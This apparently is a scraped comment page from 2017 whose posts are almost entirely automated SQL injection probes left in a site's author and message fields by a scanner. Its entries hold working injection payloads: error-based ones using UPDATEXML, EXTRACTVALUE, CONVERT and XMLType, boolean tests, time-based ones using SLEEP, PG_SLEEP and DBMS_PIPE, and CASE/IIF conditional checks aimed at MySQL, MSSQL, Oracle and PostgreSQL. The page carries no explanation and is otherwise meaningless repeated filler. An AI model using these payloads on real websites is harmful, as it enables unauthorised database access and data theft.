發表于 - 2017-08-24 02:08:09
發表于 - 2017-08-24 02:08:40
發表于 - 2017-08-24 02:08:50
發表于 - 2017-08-24 02:09:32
發表于 - 2017-08-24 02:10:17
發表于 - 2017-08-24 02:10:50
發表于 - 2017-08-24 02:11:05
發表于 - 2017-08-24 02:11:59
發表于 - 2017-08-24 02:12:05
88888 :
88888 發表于 - 2017-08-24 02:24:43
88888 :
88888 發表于 - 2017-08-24 02:24:43
88888 :
88888 發表于 - 2017-08-24 02:24:44
88888 :
88888 發表于 - 2017-08-24 02:24:45
88888 :
88888 發表于 - 2017-08-24 02:24:45
88888 :
88888 發表于 - 2017-08-24 02:24:46
88888 :
88888 發表于 - 2017-08-24 02:24:47
88888 :
88888 發表于 - 2017-08-24 02:24:48
88888 :
88888 發表于 - 2017-08-24 02:24:49
88888 :
88888) AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) AND (9=9 發表于 - 2017-08-24 02:24:52
88888 :
88888 發表于 - 2017-08-24 02:24:52
88888 :
88888 發表于 - 2017-08-24 02:24:53
88888 :
88888 AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) 發表于 - 2017-08-24 02:24:54
88888 :
88888 發表于 - 2017-08-24 02:24:55
88888 :
88888, 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) 發表于 - 2017-08-24 02:24:55
88888) AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) AND (9=9 :
88888 發表于 - 2017-08-24 02:24:55
88888 :
88888 OR 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) 發表于 - 2017-08-24 02:24:56
88888 :
88888 發表于 - 2017-08-24 02:24:56
88888 :
88888 發表于 - 2017-08-24 02:24:58
88888 AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) :
88888 發表于 - 2017-08-24 02:24:58
88888 :
88888 AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) 發表于 - 2017-08-24 02:24:58
88888 :
88888 發表于 - 2017-08-24 02:24:59
88888, 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) :
88888 發表于 - 2017-08-24 02:24:59
88888 OR 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) :
88888 發表于 - 2017-08-24 02:25:00
88888 :
88888,EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) 發表于 - 2017-08-24 02:25:00
88888 :
88888 發表于 - 2017-08-24 02:25:00
88888 AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) :
88888 發表于 - 2017-08-24 02:25:01
88888 :
88888 發表于 - 2017-08-24 02:25:01
88888,EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) :
88888 發表于 - 2017-08-24 02:25:02
88888 :
88888) AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) AND (9=9 發表于 - 2017-08-24 02:25:02
88888 :
88888 OR EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) 發表于 - 2017-08-24 02:25:03
88888) AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) AND (9=9 :
88888 發表于 - 2017-08-24 02:25:03
88888 :
88888 發表于 - 2017-08-24 02:25:03
88888 OR EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) :
88888 發表于 - 2017-08-24 02:25:04
88888 :
88888 發表于 - 2017-08-24 02:25:04
88888 :
88888 發表于 - 2017-08-24 02:25:05
88888 :
88888) AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) AND (2014=2014 發表于 - 2017-08-24 02:25:05
88888) AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) AND (2014=2014 :
88888 發表于 - 2017-08-24 02:25:05
88888 :
88888 發表于 - 2017-08-24 02:25:05
88888 :
88888 AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) 發表于 - 2017-08-24 02:25:05
88888 AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) :
88888 發表于 - 2017-08-24 02:25:06
88888,(SELECT CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) FROM SYSCOLUMNS) :
88888 發表于 - 2017-08-24 02:25:07
88888 :
88888,(SELECT CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) FROM SYSCOLUMNS) 發表于 - 2017-08-24 02:25:07
88888 :
88888 發表于 - 2017-08-24 02:25:07
88888 OR 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) :
88888 發表于 - 2017-08-24 02:25:07
88888 :
88888 OR 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) 發表于 - 2017-08-24 02:25:08
88888 AND 1=CHAR(106)+CHAR(106)+CHAR(106) :
88888 發表于 - 2017-08-24 02:25:09
88888 :
88888 AND 1=CHAR(106)+CHAR(106)+CHAR(106) 發表于 - 2017-08-24 02:25:09
88888 :
88888 發表于 - 2017-08-24 02:25:09
88888 :
88888/**/AND/**/1=CHAR(106)+CHAR(106)+CHAR(106) 發表于 - 2017-08-24 02:25:11
88888/**/AND/**/1=CHAR(106)+CHAR(106)+CHAR(106) :
88888 發表于 - 2017-08-24 02:25:11
88888 :
88888 發表于 - 2017-08-24 02:25:11
88888 :
88888) AND 1=CHAR(106)+CHAR(106)+CHAR(106) AND (9=9 發表于 - 2017-08-24 02:25:12
88888) AND 1=CHAR(106)+CHAR(106)+CHAR(106) AND (9=9 :
88888 發表于 - 2017-08-24 02:25:12
88888 :
88888 發表于 - 2017-08-24 02:25:14
88888 :
88888) AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) AND (2014=2014 發表于 - 2017-08-24 02:25:14
88888) AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) AND (2014=2014 :
88888 發表于 - 2017-08-24 02:25:14
88888 :
88888 發表于 - 2017-08-24 02:25:14
88888 :
88888 AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) 發表于 - 2017-08-24 02:25:15
88888 :
88888, 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) 發表于 - 2017-08-24 02:25:16
88888 AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) :
88888 發表于 - 2017-08-24 02:25:16
88888 :
88888 發表于 - 2017-08-24 02:25:16
88888, 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) :
88888 發表于 - 2017-08-24 02:25:17
88888 :
88888 OR 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) 發表于 - 2017-08-24 02:25:17
88888 :
88888 發表于 - 2017-08-24 02:25:17
88888 OR 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) :
88888 發表于 - 2017-08-24 02:25:18
88888 :
88888 發表于 - 2017-08-24 02:25:19
88888 :
88888 發表于 - 2017-08-24 02:25:20
88888 :
88888 發表于 - 2017-08-24 02:25:21
(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) :
88888 發表于 - 2017-08-24 02:25:21
88888 :
88888 發表于 - 2017-08-24 02:25:22
(EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74))) :
88888 發表于 - 2017-08-24 02:25:22
88888 :
88888 發表于 - 2017-08-24 02:25:22
CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) :
88888 發表于 - 2017-08-24 02:25:24
88888 :
88888" AND "08"="1N 發表于 - 2017-08-24 02:25:24
88888 :
88888 發表于 - 2017-08-24 02:25:24
(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) :
88888 發表于 - 2017-08-24 02:25:25
88888 :
88888 發表于 - 2017-08-24 02:25:25
(SELECT CHAR(116)+CHAR(104)+CHAR(105)+CHAR(110)+CHAR(107)+CHAR(58)+(SELECT (CASE WHEN (1943=1943) THEN CHAR(105) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(105)+CHAR(102)+CHAR(102)+CHAR(101)+CHAR(114)+CHAR(101)+CHAR(110)+CHAR(116)) :
88888 發表于 - 2017-08-24 02:25:26
88888 :
88888 發表于 - 2017-08-24 02:25:26
88888 :
88888 發表于 - 2017-08-24 02:25:26
88888 :
888881 發表于 - 2017-08-24 02:25:28
88888 :
88888 發表于 - 2017-08-24 02:25:28
88888 AND 47=31 :
88888 發表于 - 2017-08-24 02:25:28
88888 :
88888 發表于 - 2017-08-24 02:25:29
88888 :
88888 發表于 - 2017-08-24 02:25:30
88888 AND 72=72 :
88888 發表于 - 2017-08-24 02:25:30
88888 :
88888 發表于 - 2017-08-24 02:25:30
88888 AND 292=413 :
88888 發表于 - 2017-08-24 02:25:31
88888 :
88888 發表于 - 2017-08-24 02:25:32
88888 :
88888") AND 67=51 AND ("Ng"="Ng 發表于 - 2017-08-24 02:25:32
88888 :
88888 發表于 - 2017-08-24 02:25:32
88888 :
88888 發表于 - 2017-08-24 02:25:34
88888 :
88888 發表于 - 2017-08-24 02:25:34
888881 :
88888 發表于 - 2017-08-24 02:25:34
88888 :
88888 發表于 - 2017-08-24 02:25:35
88888 :
88888 發表于 - 2017-08-24 02:25:35
88888) AND 53=47 AND (53=53 :
88888 發表于 - 2017-08-24 02:25:35
88888 :
88888 發表于 - 2017-08-24 02:25:35
88888 :
88888%") AND 31=47 AND 1 like("% 發表于 - 2017-08-24 02:25:36
88888) AND 34=34 AND (34=34 :
88888 發表于 - 2017-08-24 02:25:36
88888 :
88888 發表于 - 2017-08-24 02:25:36
88888 :
88888 發表于 - 2017-08-24 02:25:36
88888) AND 962=821 AND (962=962 :
88888 發表于 - 2017-08-24 02:25:37
88888 :
88888 發表于 - 2017-08-24 02:25:37
88888 :
88888 RLIKE (SELECT (CASE WHEN (71=72) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) 發表于 - 2017-08-24 02:25:37
88888 :
88888 發表于 - 2017-08-24 02:25:38
88888,(SELECT (CASE WHEN (78=25) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-08-24 02:25:38
88888 :
88888 RLIKE (SELECT (CASE WHEN (86=86) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) 發表于 - 2017-08-24 02:25:38
88888 :
88888 發表于 - 2017-08-24 02:25:38
88888,(SELECT (CASE WHEN (57=57) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-08-24 02:25:39
88888 :
88888 RLIKE (SELECT (CASE WHEN (456=899) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) 發表于 - 2017-08-24 02:25:39
88888 :
88888 發表于 - 2017-08-24 02:25:39
88888,(SELECT (CASE WHEN (267=495) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-08-24 02:25:39
88888 :
88888) RLIKE (SELECT (CASE WHEN (17=24) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) AND (17=17 發表于 - 2017-08-24 02:25:39
88888 :
88888 發表于 - 2017-08-24 02:25:40
88888,IIF(26=16,88888,1/0) :
88888 發表于 - 2017-08-24 02:25:40
88888 :
88888) RLIKE (SELECT (CASE WHEN (52=52) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) AND (62=62 發表于 - 2017-08-24 02:25:40
88888,IIF(11=11,88888,1/0) :
88888 發表于 - 2017-08-24 02:25:41
88888 :
88888 發表于 - 2017-08-24 02:25:41
88888 :
88888) RLIKE (SELECT (CASE WHEN (311=657) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 0x28 END)) AND (311=311 發表于 - 2017-08-24 02:25:41
88888 :
88888 發表于 - 2017-08-24 02:25:42
88888,IIF(111=252,88888,1/0) :
88888 發表于 - 2017-08-24 02:25:42
88888 :
88888 發表于 - 2017-08-24 02:25:43
(SELECT (CASE WHEN (41=61) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-08-24 02:25:43
88888 :
88888,(SELECT (CASE WHEN (98=17) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 98*(SELECT 98 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 發表于 - 2017-08-24 02:25:43
88888 :
88888 發表于 - 2017-08-24 02:25:44
(SELECT (CASE WHEN (87=87) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-08-24 02:25:44
88888 :
88888,(SELECT (CASE WHEN (66=66) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 66*(SELECT 66 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 發表于 - 2017-08-24 02:25:44
88888 :
88888 發表于 - 2017-08-24 02:25:44
(SELECT (CASE WHEN (612=657) THEN 88888 ELSE 1/(SELECT 0) END)) :
88888 發表于 - 2017-08-24 02:25:45
88888 :
88888,(SELECT (CASE WHEN (487=314) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 487*(SELECT 487 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 發表于 - 2017-08-24 02:25:45
88888 :
88888 發表于 - 2017-08-24 02:25:45
IIF(66=51,88888,1/0) :
88888 發表于 - 2017-08-24 02:25:46
88888 :
88888,(SELECT (CASE WHEN (99=11) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 99*(SELECT 99 FROM mysql.db) END)) 發表于 - 2017-08-24 02:25:46
88888 :
88888 發表于 - 2017-08-24 02:25:46
IIF(61=61,88888,1/0) :
88888 發表于 - 2017-08-24 02:25:46
88888 :
88888,(SELECT (CASE WHEN (18=18) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 18*(SELECT 18 FROM mysql.db) END)) 發表于 - 2017-08-24 02:25:47
88888 :
88888 發表于 - 2017-08-24 02:25:47
IIF(241=493,88888,1/0) :
88888 發表于 - 2017-08-24 02:25:47
88888 :
88888,(SELECT (CASE WHEN (498=155) THEN 0x34383F636F6D6D656E743D3838383838 ELSE 498*(SELECT 498 FROM mysql.db) END)) 發表于 - 2017-08-24 02:25:47
88888 :
88888 發表于 - 2017-08-24 02:25:47
(72=33)*88888 :
88888 發表于 - 2017-08-24 02:25:48
88888 :
88888,(SELECT (CASE WHEN (43=57) THEN 0x34383F636F6D6D656E743D3838383838 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) 發表于 - 2017-08-24 02:25:48
(32=32)*88888 :
88888 發表于 - 2017-08-24 02:25:49
88888 :
88888 發表于 - 2017-08-24 02:25:49
88888 :
88888,(SELECT (CASE WHEN (14=14) THEN 0x34383F636F6D6D656E743D3838383838 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) 發表于 - 2017-08-24 02:25:49
(637=363)*88888 :
88888 發表于 - 2017-08-24 02:25:49
88888 :
88888 發表于 - 2017-08-24 02:25:49
88888 :
88888,(SELECT (CASE WHEN (516=247) THEN 0x34383F636F6D6D656E743D3838383838 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) 發表于 - 2017-08-24 02:25:50
88888 :
88888 發表于 - 2017-08-24 02:25:50
88888 :
88888 發表于 - 2017-08-24 02:25:51
88888 :
88888 發表于 - 2017-08-24 02:25:51
88888" AND "LN"="Bv :
88888 發表于 - 2017-08-24 02:25:51
88888 :
88888 發表于 - 2017-08-24 02:25:52
88888 :
88888 發表于 - 2017-08-24 02:25:52
88888 :
88888 發表于 - 2017-08-24 02:25:53
88888 :
88888 發表于 - 2017-08-24 02:25:53
88888 :
88888 發表于 - 2017-08-24 02:25:54
88888") AND 75=71 AND ("Nf"="Nf :
88888 發表于 - 2017-08-24 02:25:54
88888 :
88888 發表于 - 2017-08-24 02:25:54
88888 :
88888 發表于 - 2017-08-24 02:25:55
88888 :
88888 發表于 - 2017-08-24 02:25:56
88888 :
88888 發表于 - 2017-08-24 02:25:56
88888 :
88888 發表于 - 2017-08-24 02:25:57
88888 :
88888 發表于 - 2017-08-24 02:25:57
88888%") AND 77=75 AND 1 like("% :
88888 發表于 - 2017-08-24 02:25:57
88888 :
88888 發表于 - 2017-08-24 02:25:57
88888 :
88888 發表于 - 2017-08-24 02:25:58
88888 :
88888 發表于 - 2017-08-24 02:25:58
88888 :
88888 發表于 - 2017-08-24 02:25:58
88888 RLIKE (SELECT (CASE WHEN (44=79) THEN 88888 ELSE 0x28 END)) :
88888 發表于 - 2017-08-24 02:25:59
88888 :
88888 發表于 - 2017-08-24 02:25:59
88888 :
88888 AND SLEEP(5) 發表于 - 2017-08-24 02:25:59
88888 RLIKE (SELECT (CASE WHEN (24=24) THEN 88888 ELSE 0x28 END)) :
88888 發表于 - 2017-08-24 02:26:00
88888 :
88888 發表于 - 2017-08-24 02:26:00
88888 :
88888AND (SELECT * FROM (SELECT(SLEEP(5)))uttes) 發表于 - 2017-08-24 02:26:00
88888 RLIKE (SELECT (CASE WHEN (853=325) THEN 88888 ELSE 0x28 END)) :
88888 發表于 - 2017-08-24 02:26:00
88888 :
88888 AND 5=SLEEP(5) 發表于 - 2017-08-24 02:26:01
88888) RLIKE (SELECT (CASE WHEN (13=76) THEN 88888 ELSE 0x28 END)) AND (13=13 :
88888 發表于 - 2017-08-24 02:26:01
88888 :
88888 OR 5=SLEEP(5) 發表于 - 2017-08-24 02:26:02
88888) RLIKE (SELECT (CASE WHEN (37=37) THEN 88888 ELSE 0x28 END)) AND (14=14 :
88888 發表于 - 2017-08-24 02:26:02
88888 :
88888) AND SLEEP(5) AND (9=9 發表于 - 2017-08-24 02:26:02
88888 :
88888 發表于 - 2017-08-24 02:26:03
88888) RLIKE (SELECT (CASE WHEN (494=144) THEN 88888 ELSE 0x28 END)) AND (494=494 :
88888 發表于 - 2017-08-24 02:26:03
88888 :
88888 OR 5=SLEEP(5) 發表于 - 2017-08-24 02:26:03
88888 :
88888 發表于 - 2017-08-24 02:26:04
88888 :
88888,(SELECT (CASE WHEN (5=5) THEN SLEEP(5) ELSE 5*(SELECT 5 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 發表于 - 2017-08-24 02:26:04
88888 :
88888 發表于 - 2017-08-24 02:26:04
88888 :
88888 AND 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) 發表于 - 2017-08-24 02:26:05
88888 :
88888 發表于 - 2017-08-24 02:26:05
88888,(SELECT (CASE WHEN (63=58) THEN 88888 ELSE 63*(SELECT 63 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-08-24 02:26:05
88888 :
88888 發表于 - 2017-08-24 02:26:06
88888 :
88888 OR 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) 發表于 - 2017-08-24 02:26:06
88888,(SELECT (CASE WHEN (59=59) THEN 88888 ELSE 59*(SELECT 59 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-08-24 02:26:06
88888 :
88888 發表于 - 2017-08-24 02:26:07
88888,(SELECT (CASE WHEN (979=172) THEN 88888 ELSE 979*(SELECT 979 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-08-24 02:26:07
88888 :
88888 AND PG_SLEEP(5) 發表于 - 2017-08-24 02:26:07
88888 :
88888 發表于 - 2017-08-24 02:26:07
88888,(SELECT (CASE WHEN (17=91) THEN 88888 ELSE 17*(SELECT 17 FROM mysql.db) END)) :
88888 發表于 - 2017-08-24 02:26:08
88888 :
88888 AND 1997=PG_SLEEP(5) 發表于 - 2017-08-24 02:26:08
88888 :
88888 發表于 - 2017-08-24 02:26:08
88888,(SELECT (CASE WHEN (13=13) THEN 88888 ELSE 13*(SELECT 13 FROM mysql.db) END)) :
88888 發表于 - 2017-08-24 02:26:08
88888 :
88888AND 1997=(SELECT 5 FROM PG_SLEEP(5)) 發表于 - 2017-08-24 02:26:09
88888 :
88888 發表于 - 2017-08-24 02:26:09
88888,(SELECT (CASE WHEN (965=187) THEN 88888 ELSE 965*(SELECT 965 FROM mysql.db) END)) :
88888 發表于 - 2017-08-24 02:26:09
88888 :
88888 發表于 - 2017-08-24 02:26:09
88888 :
88888 發表于 - 2017-08-24 02:26:10
88888,(SELECT (CASE WHEN (56=32) THEN 88888 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) :
88888 發表于 - 2017-08-24 02:26:10
88888 :
88888 發表于 - 2017-08-24 02:26:10
88888 :
88888 發表于 - 2017-08-24 02:26:11
88888,(SELECT (CASE WHEN (31=31) THEN 88888 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) :
88888 發表于 - 2017-08-24 02:26:11
88888 :
888881 發表于 - 2017-08-24 02:26:11
88888 :
88888 發表于 - 2017-08-24 02:26:12
88888,(SELECT (CASE WHEN (881=257) THEN 88888 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) :
88888 發表于 - 2017-08-24 02:26:12
88888 :
88888 發表于 - 2017-08-24 02:26:13
(SELECT (CASE WHEN (13=28) THEN 88888 ELSE 13*(SELECT 13 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-08-24 02:26:13
88888 :
88888 發表于 - 2017-08-24 02:26:14
(SELECT (CASE WHEN (96=96) THEN 88888 ELSE 96*(SELECT 96 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-08-24 02:26:14
88888 :
88888 發表于 - 2017-08-24 02:26:15
(SELECT (CASE WHEN (931=185) THEN 88888 ELSE 931*(SELECT 931 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-08-24 02:26:15
MAKE_SET(83=28,88888) :
88888 發表于 - 2017-08-24 02:26:16
88888 :
88888 發表于 - 2017-08-24 02:26:16
MAKE_SET(78=78,88888) :
88888 發表于 - 2017-08-24 02:26:16
88888 :
88888 發表于 - 2017-08-24 02:26:17
MAKE_SET(534=819,88888) :
88888 發表于 - 2017-08-24 02:26:17
88888 :
88888 發表于 - 2017-08-24 02:26:18
ELT(48=51,88888) :
88888 發表于 - 2017-08-24 02:26:18
88888 :
88888 發表于 - 2017-08-24 02:26:18
ELT(86=86,88888) :
88888 發表于 - 2017-08-24 02:26:19
88888 :
88888 發表于 - 2017-08-24 02:26:19
ELT(249=194,88888) :
88888 發表于 - 2017-08-24 02:26:20
88888 :
88888 發表于 - 2017-08-24 02:26:20
(SELECT (CASE WHEN (98=68) THEN 88888 ELSE 98*(SELECT 98 FROM mysql.db) END)) :
88888 發表于 - 2017-08-24 02:26:21
88888 :
88888 發表于 - 2017-08-24 02:26:21
(SELECT (CASE WHEN (16=16) THEN 88888 ELSE 16*(SELECT 16 FROM mysql.db) END)) :
88888 發表于 - 2017-08-24 02:26:22
88888 :
88888 發表于 - 2017-08-24 02:26:22
(SELECT (CASE WHEN (752=291) THEN 88888 ELSE 752*(SELECT 752 FROM mysql.db) END)) :
88888 發表于 - 2017-08-24 02:26:23
88888 :
88888 發表于 - 2017-08-24 02:26:23
(SELECT (CASE WHEN (83=93) THEN 88888 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) :
88888 發表于 - 2017-08-24 02:26:23
88888 :
88888 發表于 - 2017-08-24 02:26:24
(SELECT (CASE WHEN (28=28) THEN 88888 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) :
88888 發表于 - 2017-08-24 02:26:24
88888 :
88888 發表于 - 2017-08-24 02:26:25
(SELECT (CASE WHEN (343=982) THEN 88888 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) :
88888 發表于 - 2017-08-24 02:26:25
88888 :
88888 發表于 - 2017-08-24 02:26:25
88888 :
88888 發表于 - 2017-08-24 02:26:26
88888 :
88888 發表于 - 2017-08-24 02:26:26
88888 :
88888 發表于 - 2017-08-24 02:26:27
88888 AND SLEEP(5) :
88888 發表于 - 2017-08-24 02:26:27
88888 :
88888 發表于 - 2017-08-24 02:26:28
88888AND (SELECT * FROM (SELECT(SLEEP(5)))uttes) :
88888 發表于 - 2017-08-24 02:26:28
88888 :
88888 發表于 - 2017-08-24 02:26:28
88888 AND 5=SLEEP(5) :
88888 發表于 - 2017-08-24 02:26:29
88888 :
88888 發表于 - 2017-08-24 02:26:29
88888 OR 5=SLEEP(5) :
88888 發表于 - 2017-08-24 02:26:30
88888 :
88888 發表于 - 2017-08-24 02:26:30
88888) AND SLEEP(5) AND (9=9 :
88888 發表于 - 2017-08-24 02:26:30
88888 :
88888 發表于 - 2017-08-24 02:26:31
88888 OR 5=SLEEP(5) :
88888 發表于 - 2017-08-24 02:26:31
88888 :
88888 發表于 - 2017-08-24 02:26:31
88888,(SELECT (CASE WHEN (5=5) THEN SLEEP(5) ELSE 5*(SELECT 5 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) :
88888 發表于 - 2017-08-24 02:26:32
88888 :
